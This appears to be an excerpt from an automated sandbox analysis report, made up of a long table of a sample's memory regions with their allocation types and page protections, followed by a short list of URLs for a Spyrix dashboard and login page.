|
||
5D6000
|
heap
|
page read and write
|
||
4FC6000
|
direct allocation
|
page read and write
|
||
61E98000
|
unkown
|
page read and write
|
||
22D2000
|
direct allocation
|
page read and write
|
||
60E000
|
heap
|
page read and write
|
||
7297000
|
heap
|
page read and write
|
||
C20000
|
heap
|
page read and write
|
||
A43000
|
heap
|
page read and write
|
||
897000
|
heap
|
page read and write
|
||
3770000
|
heap
|
page read and write
|
||
4DF0000
|
heap
|
page execute and read and write
|
||
3A4000
|
heap
|
page read and write
|
||
31DF000
|
stack
|
page read and write
|
||
3B70000
|
direct allocation
|
page execute and read and write
|
||
4390000
|
direct allocation
|
page execute and read and write
|
||
3A4000
|
heap
|
page read and write
|
||
341C000
|
direct allocation
|
page read and write
|
||
73D6000
|
heap
|
page read and write
|
||
8CB000
|
heap
|
page read and write
|
||
31E0000
|
heap
|
page read and write
|
||
C63000
|
trusted library allocation
|
page execute and read and write
|
||
2A4F000
|
stack
|
page read and write
|
||
6770000
|
heap
|
page read and write
|
||
1DBC000
|
heap
|
page read and write
|
||
705C000
|
heap
|
page read and write
|
||
2490000
|
heap
|
page read and write
|
||
CD0000
|
heap
|
page read and write
|
||
2389000
|
heap
|
page read and write
|
||
1855000
|
heap
|
page read and write
|
||
71D6000
|
heap
|
page read and write
|
||
2F1F000
|
heap
|
page read and write
|
||
89D000
|
stack
|
page read and write
|
||
39C0000
|
direct allocation
|
page execute and read and write
|
||
2FE0000
|
heap
|
page read and write
|
||
3B40000
|
direct allocation
|
page execute and read and write
|
||
22F8000
|
direct allocation
|
page read and write
|
||
3890000
|
direct allocation
|
page execute and read and write
|
||
743C000
|
heap
|
page read and write
|
||
3463000
|
direct allocation
|
page read and write
|
||
61E8A000
|
unkown
|
page readonly
|
||
34C4000
|
heap
|
page read and write
|
||
2EDD000
|
stack
|
page read and write
|
||
51BE000
|
stack
|
page read and write
|
||
1CC0000
|
heap
|
page read and write
|
||
CD9000
|
heap
|
page read and write
|
||
747A000
|
heap
|
page read and write
|
||
3351000
|
direct allocation
|
page execute and read and write
|
||
7FDF0000
|
direct allocation
|
page read and write
|
||
2796000
|
trusted library allocation
|
page read and write
|
||
1BC000
|
stack
|
page read and write
|
||
81D0000
|
trusted library allocation
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
722000
|
heap
|
page read and write
|
||
1A6E000
|
stack
|
page read and write
|
||
36B9000
|
trusted library allocation
|
page read and write
|
||
39A0000
|
direct allocation
|
page execute and read and write
|
||
1052000
|
unkown
|
page readonly
|
||
2385000
|
heap
|
page read and write
|
||
3070000
|
heap
|
page read and write
|
||
2D90000
|
heap
|
page read and write
|
||
71C2000
|
heap
|
page read and write
|
||
725000
|
heap
|
page read and write
|
||
33C0000
|
direct allocation
|
page read and write
|
||
2F50000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
81B0000
|
trusted library allocation
|
page read and write
|
||
2D0E000
|
stack
|
page read and write
|
||
855000
|
heap
|
page read and write
|
||
71B8000
|
heap
|
page read and write
|
||
56D000
|
stack
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
7FDDB000
|
direct allocation
|
page read and write
|
||
71C2000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
345B000
|
direct allocation
|
page read and write
|
||
7E20000
|
trusted library allocation
|
page read and write
|
||
718000
|
heap
|
page read and write
|
||
2EA8000
|
heap
|
page read and write
|
||
32F0000
|
direct allocation
|
page read and write
|
||
890000
|
unkown
|
page execute and read and write
|
||
2762000
|
trusted library allocation
|
page read and write
|
||
1B4F000
|
stack
|
page read and write
|
||
7FE17000
|
direct allocation
|
page read and write
|
||
1116000
|
unkown
|
page read and write
|
||
570000
|
heap
|
page read and write
|
||
647000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
3C60000
|
direct allocation
|
page execute and read and write
|
||
2B20000
|
heap
|
page read and write
|
||
49C000
|
stack
|
page read and write
|
||
31D0000
|
direct allocation
|
page execute and read and write
|
||
7224000
|
heap
|
page read and write
|
||
2530000
|
heap
|
page read and write
|
||
5050000
|
heap
|
page read and write
|
||
3200000
|
remote allocation
|
page read and write
|
||
80D000
|
heap
|
page read and write
|
||
71B0000
|
trusted library allocation
|
page read and write
|
||
CD0000
|
heap
|
page read and write
|
||
610000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
2F60000
|
heap
|
page read and write
|
||
78D0000
|
trusted library allocation
|
page read and write
|
||
7294000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
4100000
|
direct allocation
|
page execute and read and write
|
||
500F000
|
stack
|
page read and write
|
||
A1A000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
7174000
|
trusted library allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
1FE000
|
heap
|
page read and write
|
||
9E0000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
6776000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
916000
|
heap
|
page read and write
|
||
6F9000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
2B8D000
|
stack
|
page read and write
|
||
78D0000
|
trusted library allocation
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
5AF000
|
unkown
|
page write copy
|
||
3428000
|
direct allocation
|
page read and write
|
||
6EC000
|
heap
|
page read and write
|
||
A05000
|
heap
|
page read and write
|
||
97E000
|
stack
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
4591000
|
direct allocation
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
DC1000
|
unkown
|
page execute read
|
||
C2A000
|
heap
|
page read and write
|
||
2533000
|
heap
|
page read and write
|
||
3487000
|
direct allocation
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
111A000
|
unkown
|
page write copy
|
||
865000
|
heap
|
page read and write
|
||
7435000
|
heap
|
page read and write
|
||
370000
|
heap
|
page read and write
|
||
C80000
|
trusted library allocation
|
page read and write
|
||
4F40000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
4E1F000
|
stack
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
2F16000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
7E20000
|
trusted library allocation
|
page read and write
|
||
450A000
|
direct allocation
|
page read and write
|
||
88FD000
|
stack
|
page read and write
|
||
298E000
|
stack
|
page read and write
|
||
940000
|
heap
|
page read and write
|
||
36B0000
|
heap
|
page read and write
|
||
2D30000
|
heap
|
page read and write
|
||
804000
|
heap
|
page read and write
|
||
7C0000
|
heap
|
page read and write
|
||
67DF000
|
stack
|
page read and write
|
||
2DAE000
|
heap
|
page read and write
|
||
7409000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
39D0000
|
direct allocation
|
page execute and read and write
|
||
39F0000
|
direct allocation
|
page execute and read and write
|
||
3C50000
|
direct allocation
|
page execute and read and write
|
||
4BF0000
|
heap
|
page read and write
|
||
32CE000
|
stack
|
page read and write
|
||
990000
|
heap
|
page read and write
|
||
2F19000
|
heap
|
page read and write
|
||
22AD000
|
direct allocation
|
page read and write
|
||
CC2000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
349C000
|
direct allocation
|
page read and write
|
||
3810000
|
heap
|
page read and write
|
||
7061000
|
heap
|
page read and write
|
||
71B8000
|
heap
|
page read and write
|
||
2D7C000
|
stack
|
page read and write
|
||
3D80000
|
direct allocation
|
page execute and read and write
|
||
670000
|
heap
|
page read and write
|
||
274F000
|
trusted library allocation
|
page read and write
|
||
2BB000
|
stack
|
page read and write
|
||
630000
|
heap
|
page read and write
|
||
1111000
|
unkown
|
page read and write
|
||
8C8000
|
heap
|
page read and write
|
||
2A3E000
|
stack
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
2E20000
|
heap
|
page read and write
|
||
4250000
|
direct allocation
|
page execute and read and write
|
||
544000
|
heap
|
page read and write
|
||
CD5000
|
heap
|
page read and write
|
||
5A1000
|
unkown
|
page write copy
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
22E8000
|
direct allocation
|
page read and write
|
||
359B000
|
heap
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
5FE000
|
stack
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
2F1D000
|
heap
|
page read and write
|
||
2BB000
|
stack
|
page read and write
|
||
855000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
2F23000
|
heap
|
page read and write
|
||
CC3000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
3238000
|
heap
|
page read and write
|
||
6852000
|
heap
|
page read and write
|
||
4C3F000
|
stack
|
page read and write
|
||
A00000
|
heap
|
page read and write
|
||
718000
|
heap
|
page read and write
|
||
C1B000
|
heap
|
page read and write
|
||
81B0000
|
trusted library allocation
|
page read and write
|
||
9FC000
|
stack
|
page read and write
|
||
4541000
|
direct allocation
|
page read and write
|
||
35AB000
|
heap
|
page read and write
|
||
3EE0000
|
direct allocation
|
page execute and read and write
|
||
722000
|
heap
|
page read and write
|
||
5BA000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
78D0000
|
trusted library allocation
|
page read and write
|
||
358D000
|
heap
|
page read and write
|
||
301F000
|
stack
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
4F1E000
|
stack
|
page read and write
|
||
5DF000
|
stack
|
page read and write
|
||
71C1000
|
heap
|
page read and write
|
||
C21000
|
heap
|
page read and write
|
||
3FA0000
|
direct allocation
|
page execute and read and write
|
||
2133000
|
direct allocation
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
63D000
|
heap
|
page read and write
|
||
4B7E000
|
stack
|
page read and write
|
||
2690000
|
direct allocation
|
page read and write
|
||
71B9000
|
heap
|
page read and write
|
||
2BF0000
|
heap
|
page read and write
|
||
510F4FF000
|
stack
|
page read and write
|
||
859000
|
heap
|
page read and write
|
||
5C0000
|
heap
|
page read and write
|
||
32F0000
|
direct allocation
|
page read and write
|
||
890000
|
heap
|
page read and write
|
||
17D7000
|
heap
|
page read and write
|
||
3D90000
|
direct allocation
|
page execute and read and write
|
||
34C4000
|
heap
|
page read and write
|
||
231A000
|
direct allocation
|
page read and write
|
||
90D000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
70F000
|
heap
|
page read and write
|
||
81B0000
|
trusted library allocation
|
page read and write
|
||
401000
|
unkown
|
page execute and write copy
|
||
1FA64A90000
|
heap
|
page read and write
|
||
73C000
|
heap
|
page read and write
|
||
2798000
|
heap
|
page read and write
|
||
3290000
|
heap
|
page read and write
|
||
289D000
|
stack
|
page read and write
|
||
7FD5E000
|
direct allocation
|
page read and write
|
||
4200000
|
direct allocation
|
page execute and read and write
|
||
865000
|
unkown
|
page execute and write copy
|
||
630000
|
heap
|
page read and write
|
||
1DB0000
|
heap
|
page read and write
|
||
37D0000
|
direct allocation
|
page execute and read and write
|
||
32F0000
|
direct allocation
|
page read and write
|
||
3364000
|
direct allocation
|
page execute and read and write
|
||
2D8E000
|
stack
|
page read and write
|
||
38A0000
|
direct allocation
|
page execute and read and write
|
||
1F0000
|
heap
|
page read and write
|
||
CBD000
|
heap
|
page read and write
|
||
1F6000
|
heap
|
page read and write
|
||
7A0000
|
heap
|
page read and write
|
||
A2AF000
|
stack
|
page read and write
|
||
7224000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
7481000
|
heap
|
page read and write
|
||
1117000
|
unkown
|
page write copy
|
||
3A4000
|
heap
|
page read and write
|
||
61E9B000
|
unkown
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
4EE0000
|
heap
|
page read and write
|
||
26BB000
|
direct allocation
|
page read and write
|
||
CC4000
|
heap
|
page read and write
|
||
1864000
|
heap
|
page read and write
|
||
44A0000
|
direct allocation
|
page read and write
|
||
2DF0000
|
heap
|
page read and write
|
||
506000
|
unkown
|
page read and write
|
||
510F47B000
|
stack
|
page read and write
|
||
35A1000
|
heap
|
page read and write
|
||
3840000
|
direct allocation
|
page execute and read and write
|
||
2BF0000
|
heap
|
page read and write
|
||
86F0000
|
trusted library allocation
|
page execute and read and write
|
||
900000
|
heap
|
page read and write
|
||
9E90000
|
trusted library allocation
|
page read and write
|
||
22EF000
|
direct allocation
|
page read and write
|
||
7FD50000
|
direct allocation
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
884000
|
heap
|
page read and write
|
||
6FC000
|
heap
|
page read and write
|
||
AC8000
|
heap
|
page read and write
|
||
7E20000
|
trusted library allocation
|
page read and write
|
||
2FFE000
|
stack
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
341C000
|
direct allocation
|
page read and write
|
||
73F7000
|
heap
|
page read and write
|
||
906000
|
heap
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
4420000
|
direct allocation
|
page execute and read and write
|
||
339A000
|
heap
|
page read and write
|
||
3660000
|
direct allocation
|
page execute and read and write
|
||
7413000
|
heap
|
page read and write
|
||
3571000
|
heap
|
page read and write
|
||
104E000
|
unkown
|
page read and write
|
||
36DC000
|
direct allocation
|
page read and write
|
||
AF0000
|
heap
|
page read and write
|
||
342F000
|
direct allocation
|
page read and write
|
||
72EE000
|
stack
|
page read and write
|
||
227D000
|
direct allocation
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
7225000
|
heap
|
page read and write
|
||
1052000
|
unkown
|
page readonly
|
||
2D38000
|
heap
|
page read and write
|
||
3DE0000
|
direct allocation
|
page execute and read and write
|
||
76A2000
|
direct allocation
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
34C4000
|
heap
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
3CE0000
|
direct allocation
|
page execute and read and write
|
||
3A4000
|
heap
|
page read and write
|
||
738C000
|
heap
|
page read and write
|
||
32F0000
|
direct allocation
|
page read and write
|
||
450000
|
heap
|
page read and write
|
||
7061000
|
heap
|
page read and write
|
||
2D5A000
|
heap
|
page read and write
|
||
78F000
|
stack
|
page read and write
|
||
550000
|
heap
|
page read and write
|
||
C90000
|
heap
|
page read and write
|
||
3640000
|
direct allocation
|
page execute and read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
16D0000
|
heap
|
page read and write
|
||
26A0000
|
heap
|
page execute and read and write
|
||
773F000
|
direct allocation
|
page read and write
|
||
29D0000
|
heap
|
page read and write
|
||
61E88000
|
unkown
|
page write copy
|
||
8C0E000
|
stack
|
page read and write
|
||
4C10000
|
trusted library allocation
|
page read and write
|
||
C82000
|
trusted library allocation
|
page read and write
|
||
1849000
|
heap
|
page read and write
|
||
C70000
|
trusted library allocation
|
page read and write
|
||
3C30000
|
direct allocation
|
page execute and read and write
|
||
4040000
|
direct allocation
|
page execute and read and write
|
||
4380000
|
direct allocation
|
page execute and read and write
|
||
4CDF000
|
stack
|
page read and write
|
||
3BC0000
|
direct allocation
|
page execute and read and write
|
||
6E9000
|
heap
|
page read and write
|
||
2E6E000
|
stack
|
page read and write
|
||
3490000
|
heap
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
81B0000
|
trusted library allocation
|
page read and write
|
||
CC2000
|
heap
|
page read and write
|
||
3670000
|
direct allocation
|
page execute and read and write
|
||
2791000
|
heap
|
page read and write
|
||
7FDCE000
|
direct allocation
|
page read and write
|
||
277D000
|
heap
|
page read and write
|
||
DC0000
|
unkown
|
page readonly
|
||
502000
|
unkown
|
page read and write
|
||
806000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
3900000
|
direct allocation
|
page execute and read and write
|
||
701000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
32C3000
|
direct allocation
|
page read and write
|
||
2F40000
|
heap
|
page read and write
|
||
DC1000
|
unkown
|
page execute read
|
||
7EE000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
8FC000
|
heap
|
page read and write
|
||
C21000
|
heap
|
page read and write
|
||
133F000
|
stack
|
page read and write
|
||
346A000
|
direct allocation
|
page read and write
|
||
87FE000
|
stack
|
page read and write
|
||
C27000
|
heap
|
page read and write
|
||
1052000
|
unkown
|
page readonly
|
||
57EB000
|
heap
|
page read and write
|
||
34B8000
|
heap
|
page read and write
|
||
71C8000
|
heap
|
page read and write
|
||
5B9000
|
heap
|
page read and write
|
||
185E000
|
heap
|
page read and write
|
||
4F70000
|
heap
|
page read and write
|
||
AA0000
|
heap
|
page read and write
|
||
CC4000
|
heap
|
page read and write
|
||
81B0000
|
trusted library allocation
|
page read and write
|
||
7150000
|
trusted library allocation
|
page read and write
|
||
5140000
|
heap
|
page read and write
|
||
3ED0000
|
direct allocation
|
page execute and read and write
|
||
3940000
|
direct allocation
|
page execute and read and write
|
||
C0C000
|
heap
|
page read and write
|
||
3820000
|
direct allocation
|
page execute and read and write
|
||
8BC000
|
heap
|
page read and write
|
||
850000
|
heap
|
page read and write
|
||
DC1000
|
unkown
|
page execute read
|
||
42B0000
|
direct allocation
|
page execute and read and write
|
||
34C4000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
33AE000
|
direct allocation
|
page execute and read and write
|
||
2F80000
|
heap
|
page read and write
|
||
3700000
|
direct allocation
|
page execute and read and write
|
||
923E000
|
stack
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
C8C000
|
heap
|
page read and write
|
||
27E0000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
4490000
|
direct allocation
|
page execute and read and write
|
||
904E000
|
stack
|
page read and write
|
||
CDB000
|
heap
|
page read and write
|
||
8C2000
|
heap
|
page read and write
|
||
3478000
|
direct allocation
|
page read and write
|
||
1CAE000
|
stack
|
page read and write
|
||
9A0000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
C25000
|
heap
|
page read and write
|
||
2520000
|
direct allocation
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
7FD32000
|
direct allocation
|
page read and write
|
||
2D36000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
6771000
|
heap
|
page read and write
|
||
40D0000
|
direct allocation
|
page execute and read and write
|
||
8D5000
|
heap
|
page read and write
|
||
2EC0000
|
heap
|
page read and write
|
||
6784000
|
heap
|
page read and write
|
||
2DCF000
|
stack
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
3AA0000
|
direct allocation
|
page execute and read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
3B00000
|
direct allocation
|
page execute and read and write
|
||
2C3F000
|
stack
|
page read and write
|
||
6FCD000
|
stack
|
page read and write
|
||
CC4000
|
heap
|
page read and write
|
||
30FA000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
3338000
|
direct allocation
|
page read and write
|
||
4310000
|
direct allocation
|
page execute and read and write
|
||
303F000
|
stack
|
page read and write
|
||
44E1000
|
direct allocation
|
page read and write
|
||
2658000
|
heap
|
page read and write
|
||
DC0000
|
unkown
|
page readonly
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
57B0000
|
heap
|
page read and write
|
||
DC1000
|
unkown
|
page execute read
|
||
3A4000
|
heap
|
page read and write
|
||
1FA64A84000
|
heap
|
page read and write
|
||
7FD6D000
|
direct allocation
|
page read and write
|
||
2DCE000
|
stack
|
page read and write
|
||
455D000
|
direct allocation
|
page read and write
|
||
6500000
|
direct allocation
|
page read and write
|
||
740D000
|
heap
|
page read and write
|
||
104E000
|
unkown
|
page write copy
|
||
A14000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
3700000
|
heap
|
page read and write
|
There are 2479 hidden memdumps, click here to show them.
DOM / HTML
URL
|
Malicious
|
|
---|---|---|
https://dashboard.spyrix.com/
|
||
https://dashboard.spyrix.com/
|
||
https://dashboard.spyrix.com/login
|